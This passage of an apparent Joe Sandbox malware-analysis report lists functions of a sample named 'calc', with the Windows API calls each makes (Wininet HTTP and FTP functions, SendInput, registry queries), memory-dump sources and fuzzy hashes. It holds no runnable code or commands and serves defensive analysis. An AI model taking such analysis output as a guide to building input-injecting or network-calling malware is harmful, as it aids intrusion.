      • Part of subcall function 00414513: RegQueryValueExW.ADVAPI32(?,00000001,00000000,00000000,?,-0000076C,?,?,004371E3,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,ProgramFilesDir,00000104,%.3d,0047BCF5,00000001), ref: 00414549
      • Part of subcall function 00414513: RegCloseKey.ADVAPI32(?,?,?,004371E3,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,ProgramFilesDir,00000104,%.3d,0047BCF5,00000001,-0000076C,00000001,0045DC34,00000004,?), ref: 0041455A
    • mouse_event.USER32(00000000,00000000,00000000,00000000,00000000), ref: 00415E70
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: CloseOpenQueryValuemouse_event
    • String ID: 1$Control Panel\Mouse$SwapMouseButtons
    • API String ID: 3120867179-1333076132
    • Opcode ID: 4c009d8be6e611ea7ee0ed7a481dcb082e4cdc1e9cdb4b0e7271ae557d9b4d1a
    • Instruction ID: 2ea29db1dba191207fecf7cfac24f3fe5103bd27f5e71a9027c62f24b1f2dd5b
    • Opcode Fuzzy Hash: 4c009d8be6e611ea7ee0ed7a481dcb082e4cdc1e9cdb4b0e7271ae557d9b4d1a
    • Instruction Fuzzy Hash: 5E01A2B3E54704FAF31027748C46BFF2198D7957A5F290427FA12E2181F2AC8FC250AA
    Function 0040EE82 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55libraryloaderCOMMON
    Download Yara Rule
    APIs
    • LoadLibraryA.KERNEL32(?), ref: 0040EEA9
    • GetProcAddress.KERNEL32(00000000,AU3_GetPluginDetails), ref: 0040EEC1
    • FreeLibrary.KERNEL32 ref: 0040EECD
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Library$AddressFreeLoadProc
    • String ID: AU3_GetPluginDetails
    • API String ID: 145871493-4132174516
    • Opcode ID: bf52db12d3d9933b844a19cd8c859c7f95544091a9fd9c7a58190ead5e102cca
    • Instruction ID: e1a76256ef9ae7ff8ee669f6e948607f4e0c31d0b2043c83b6dad8dec330593a
    • Opcode Fuzzy Hash: bf52db12d3d9933b844a19cd8c859c7f95544091a9fd9c7a58190ead5e102cca
    • Instruction Fuzzy Hash: 5E117C72600209EFDB258F66CC44B9A7BE8FB513A2F10487AE546E71D0D734DA50CA98
    Function 00402FF5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowCOMMON
    Download Yara Rule
    APIs
      • Part of subcall function 004030FC: SendMessageTimeoutW.USER32(0045C6D0,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00403119
      • Part of subcall function 004030FC: GetWindowThreadProcessId.USER32(0045C6D0,00000000), ref: 0040312E
      • Part of subcall function 004030FC: GetCurrentThreadId.KERNEL32 ref: 00403135
      • Part of subcall function 004030FC: AttachThreadInput.USER32(00000000,?,0040301A,?,00000001), ref: 0040313C
    • GetFocus.USER32 ref: 0040301A
    • GetClassNameW.USER32(?,?,000000FF), ref: 0040304A
    • 73A26A70.USER32(?,004030A7,?,?,?,?,?,00000000), ref: 0040306D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Thread$AttachClassCurrentFocusInputMessageNameProcessSendTimeoutWindow
    • String ID: %s%d
    • API String ID: 1301947253-1110647743
    • Opcode ID: 730090e4f0b0e680f519ccf9d93286e9a18f105700d0df6fcfd268dc18e1b144
    • Instruction ID: 926bc7da58db08b6bc9675cbce6de1d41958d0f98dd2598794a39adfdb66f09f
    • Opcode Fuzzy Hash: 730090e4f0b0e680f519ccf9d93286e9a18f105700d0df6fcfd268dc18e1b144
    • Instruction Fuzzy Hash: 9911A731500708BFDB216F61DC8AF9A7B6DBF00341F10442AF50665492D779F651DB58
    Function 00402FF7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowCOMMON
    Download Yara Rule
    APIs
      • Part of subcall function 004030FC: SendMessageTimeoutW.USER32(0045C6D0,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00403119
      • Part of subcall function 004030FC: GetWindowThreadProcessId.USER32(0045C6D0,00000000), ref: 0040312E
      • Part of subcall function 004030FC: GetCurrentThreadId.KERNEL32 ref: 00403135
      • Part of subcall function 004030FC: AttachThreadInput.USER32(00000000,?,0040301A,?,00000001), ref: 0040313C
    • GetFocus.USER32 ref: 0040301A
    • GetClassNameW.USER32(?,?,000000FF), ref: 0040304A
    • 73A26A70.USER32(?,004030A7,?,?,?,?,?,00000000), ref: 0040306D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Thread$AttachClassCurrentFocusInputMessageNameProcessSendTimeoutWindow
    • String ID: %s%d
    • API String ID: 1301947253-1110647743
    • Opcode ID: 8136f2b711d27099e404f379e3d4cb9944dd1ded2519c2d0a9f1db92a329356f
    • Instruction ID: 5efcb7465573b2ab94bf4c2dd86e8e81f3aa2c00291f0960b02ed275af46cd7d
    • Opcode Fuzzy Hash: 8136f2b711d27099e404f379e3d4cb9944dd1ded2519c2d0a9f1db92a329356f
    • Instruction Fuzzy Hash: 3911A731500708BFDF216F61DC8AF9A7BADBF00341F00442AB50665492D779E655DB58
    Function 00408A31 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46windowCOMMON
    Download Yara Rule
    APIs
    • GetMenuItemInfoW.USER32(?), ref: 00408A63
    • SetMenuItemInfoW.USER32(?,?,00000000,0000002C), ref: 00408A82
    • DrawMenuBar.USER32 ref: 00408A8E
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Menu$InfoItem$Draw
    • String ID: ,
    • API String ID: 3227129158-3772416878
    • Opcode ID: 1f0134a0840b9430bbabbd9969d9198bf3b65724aeaf48ec2f33519598fe4957
    • Instruction ID: 2f9b948e05608c0d9f315e3ffc74653f53923b8b4e1199330be738cfb09ea567
    • Opcode Fuzzy Hash: 1f0134a0840b9430bbabbd9969d9198bf3b65724aeaf48ec2f33519598fe4957
    • Instruction Fuzzy Hash: 6E018C71A14209EEEB219FA0DD44BEE7BB4BF04354F14403FF985A01A1DB788850EF58
    Function 0044C282 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON
    Download Yara Rule
    APIs
    • FlsFree.KERNEL32(00000005,0044C583,?,0045B1B8,00000060), ref: 0044C28D
    • RtlDeleteCriticalSection.KERNEL32(00000000,00000000,00000000,?,0044C583,?,0045B1B8,00000060), ref: 0044C5EC
    • RtlDeleteCriticalSection.KERNEL32(00000005,00000000,?,0044C583,?,0045B1B8,00000060), ref: 0044C616
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: CriticalDeleteSection$Free
    • String ID: @tF
    • API String ID: 1584690612-1530334341
    • Opcode ID: 592dba9f755fb29576838d3d3332456b20e79848abd7324f8e72fd6093b56b49
    • Instruction ID: 61e3c6bb3eba4695027c1047a15e5766942772b649c9c3fc9bb0005c32650307
    • Opcode Fuzzy Hash: 592dba9f755fb29576838d3d3332456b20e79848abd7324f8e72fd6093b56b49
    • Instruction Fuzzy Hash: 99F0F432842711A7E6745A199CC841AB29A5B01337B19423FE8BAE3250EB3C9C4149AE
    Function 00454432 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 29libraryloaderCOMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,0045C190,00000010,0044C5B3,00000000,00000FA0,74DF0A60,00000000,0044C49E,0044BF78,?,0045B1B8,00000060), ref: 00454455
    • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionAndSpinCount), ref: 00454465
    Strings
    • InitializeCriticalSectionAndSpinCount, xrefs: 0045445F
    • kernel32.dll, xrefs: 00454450
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: AddressHandleModuleProc
    • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
    • API String ID: 1646373207-3733552308
    • Opcode ID: 4a018f533323f2aaee8c4e280d1481cc524ee50d6290ec7fc4e7668ab531a28d
    • Instruction ID: ab1926dd2af41fa3029d16cc9033a7aba392298642699e74dd3f1240ded0750e
    • Opcode Fuzzy Hash: 4a018f533323f2aaee8c4e280d1481cc524ee50d6290ec7fc4e7668ab531a28d
    • Instruction Fuzzy Hash: 96F09070580301ABDF249FB59C45B5936E0BB4575EF208626FC10992A3E77C8A8AEB0D
    Function 00442E50 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15COMMON
    Download Yara Rule
    APIs
    • GetTempPathA.KERNEL32(00000104,?), ref: 00442E65
    • GetTempFileNameA.KERNEL32(?,aut,00000000,00442FBD), ref: 00442E7C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Temp$FileNamePath
    • String ID: aut${QB
    • API String ID: 3285503233-2878779683
    • Opcode ID: 21fe6b80f46257c1ad797387a32405323667ccc13c02846317d97aa5df9483ca
    • Instruction ID: 3d67460f30d7d14f51de960d09033c2ab69468caedc65b49ba4bb88e44c07f54
    • Opcode Fuzzy Hash: 21fe6b80f46257c1ad797387a32405323667ccc13c02846317d97aa5df9483ca
    • Instruction Fuzzy Hash: 1CD05E7150430DFBDB10AB90DC4AFC9776C9714709F0004A1B68495090DAF4D9C58B5A
    Function 004551AD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • GetModuleHandleA.KERNEL32(KERNEL32,0044DC95), ref: 004551B2
    • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 004551C2
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: AddressHandleModuleProc
    • String ID: IsProcessorFeaturePresent$KERNEL32
    • API String ID: 1646373207-3105848591
    • Opcode ID: fc31ca84f5e165f95252b0e62b8a217bca41735e7ac5cce235b2bdaf83c21cb6
    • Instruction ID: 40fc8ca460b8c6a49fdf777bf37c8c5f379354e5d7432fbb057b73973fbd7f2c
    • Opcode Fuzzy Hash: fc31ca84f5e165f95252b0e62b8a217bca41735e7ac5cce235b2bdaf83c21cb6
    • Instruction Fuzzy Hash: 1EC04070785F05F7DE105BB15CA97373A585B44B43F244456BC09D05D3DE5CC908D52D
    Function 0043004A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
    Download Yara Rule
    APIs
    • LoadLibraryA.KERNEL32(Wininet.dll,0042FD8C,?,0042ACF7,?,20000013,?,?,00000000), ref: 00430055
    • GetProcAddress.KERNEL32(00000000,HttpQueryInfoW), ref: 00430067
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: HttpQueryInfoW$Wininet.dll
    • API String ID: 2574300362-1827896123
    • Opcode ID: 2c1ab40f9f572c927a0f49cc0b26cfcbf8b99dfb582a9751682da44302c35902
    • Instruction ID: ae3e7c10155bc4f291df986d1bcd477b896a64aa057136c8ef096f6152cf38fa
    • Opcode Fuzzy Hash: 2c1ab40f9f572c927a0f49cc0b26cfcbf8b99dfb582a9751682da44302c35902
    • Instruction Fuzzy Hash: C7D0C970A41302EECB208F71D8497137AF8AB44B02F209A6BB486D1260E77CE480CA1E
    Function 00430071 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
    Download Yara Rule
    APIs
    • LoadLibraryA.KERNEL32(Wininet.dll,0042FDA2,?,0042AE6F,00000000,00000000,?,00000000,00000000,00000000,80000000,00000000), ref: 0043007C
    • GetProcAddress.KERNEL32(00000000,HttpOpenRequestW), ref: 0043008E
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: HttpOpenRequestW$Wininet.dll
    • API String ID: 2574300362-1025864003
    • Opcode ID: fa93d8326efd3392f730695c0b1e64c3d25dd35159c5fa05e1670c90f17307a6
    • Instruction ID: 3aaa05196208d3405ad0e3724d1edfe7fa9879c1e0bd29b72703f7ab18a18b8f
    • Opcode Fuzzy Hash: fa93d8326efd3392f730695c0b1e64c3d25dd35159c5fa05e1670c90f17307a6
    • Instruction Fuzzy Hash: CED0C970641302EECB208F71D849B237AF8AB48702F20996AB49ED1260E778C840CE1E
    Function 00430023 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
    Download Yara Rule
    APIs
    • LoadLibraryA.KERNEL32(Wininet.dll,0042FD76,?,0042AF54,00000000,?,80000000,80000002,00000000), ref: 0043002E
    • GetProcAddress.KERNEL32(00000000,FtpOpenFileW), ref: 00430040
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: FtpOpenFileW$Wininet.dll
    • API String ID: 2574300362-1343039947
    • Opcode ID: 6420013c9dd9f3a00795251f9aeb9b087d60abef74e79443d0e6b0bbbbe75e81
    • Instruction ID: 762bacf6f0d06cfb391cf0f2ff01321af7d6c7216697d0843cc30400aa9164b9
    • Opcode Fuzzy Hash: 6420013c9dd9f3a00795251f9aeb9b087d60abef74e79443d0e6b0bbbbe75e81
    • Instruction Fuzzy Hash: C3D0C974641302EECB608F61D8497137AF8AB44702F20997BB48AD1261E77CD440CE5E
    Function 004300E6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
    Download Yara Rule
    APIs
    • LoadLibraryA.KERNEL32(Wininet.dll,0042FE10,00000000,0042B1F3,00000000,00000032,?,00000008,?,00000003), ref: 004300F1
    • GetProcAddress.KERNEL32(00000000,InternetSetOptionW), ref: 00430103
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: InternetSetOptionW$Wininet.dll
    • API String ID: 2574300362-1330685833
    • Opcode ID: 95de0dffc22d0963259c4d69c6c45233e077d41ec1b1f5133d5896be310fb27d
    • Instruction ID: ff59ce156c35f3968f4afa164b3a05efdcf9e96a6bec108e9525e22fa4784c4e
    • Opcode Fuzzy Hash: 95de0dffc22d0963259c4d69c6c45233e077d41ec1b1f5133d5896be310fb27d
    • Instruction Fuzzy Hash: 56D0C970641312EECB20AF61D8497137FE8AB55702F20996AB486D1262E778C440CF1E
    Function 004120F8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
    Download Yara Rule
    APIs
    • LoadLibraryA.KERNEL32(user32.dll,00410D3B,?,?,004115D3,00000012,?,00000000,?,00000000), ref: 00412103
    • GetProcAddress.KERNEL32(00000000,SendInput), ref: 00412115
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: SendInput$user32.dll
    • API String ID: 2574300362-1064832393
    • Opcode ID: 4ead3b7de1eb813e2890999ff995c73bf3de4ffd0baf0b3798f1e810c2294c97
    • Instruction ID: b963cc7c8b00b921c783b673ea5c61c7744dee692fadaf3b76782265ccaed0cb
    • Opcode Fuzzy Hash: 4ead3b7de1eb813e2890999ff995c73bf3de4ffd0baf0b3798f1e810c2294c97
    • Instruction Fuzzy Hash: 38D0C970540306EFCB209FB1C98A71277E8AB00707F20886BB989E1293D7B8C484CA1C
    Function 00430098 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
    Download Yara Rule
    APIs
    • LoadLibraryA.KERNEL32(Wininet.dll,0042FDB8,?,0042AEB5,00000000,00000000,00000000,00000000,00000000), ref: 004300A3
    • GetProcAddress.KERNEL32(00000000,HttpSendRequestW), ref: 004300B5
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: HttpSendRequestW$Wininet.dll
    • API String ID: 2574300362-571859679
    • Opcode ID: 56287dbb5c8fa613192b2f9640bf059d33571e061af0d96863c42d5ccb391b72
    • Instruction ID: f9c0c41dff0c6647ec6965b73e0666f837cba77f00087c9ce6256905e321456e
    • Opcode Fuzzy Hash: 56287dbb5c8fa613192b2f9640bf059d33571e061af0d96863c42d5ccb391b72
    • Instruction Fuzzy Hash: FFD0C970641306EECB749F61D8497137AF8AB44702F20996BF886D1260E7B8D480CA1F
    Function 004300BF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
    Download Yara Rule
    APIs
    • LoadLibraryA.KERNEL32(Wininet.dll,0042FDFA,00000000,0042B1CB,00000000,00000028,?,00000002,?,00000003), ref: 004300CA
    • GetProcAddress.KERNEL32(00000000,InternetQueryOptionW), ref: 004300DC
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: InternetQueryOptionW$Wininet.dll
    • API String ID: 2574300362-1362718701
    • Opcode ID: 0d504de1963ce42602e00efced6689885ade31a502019b9bd417622be1b721a3
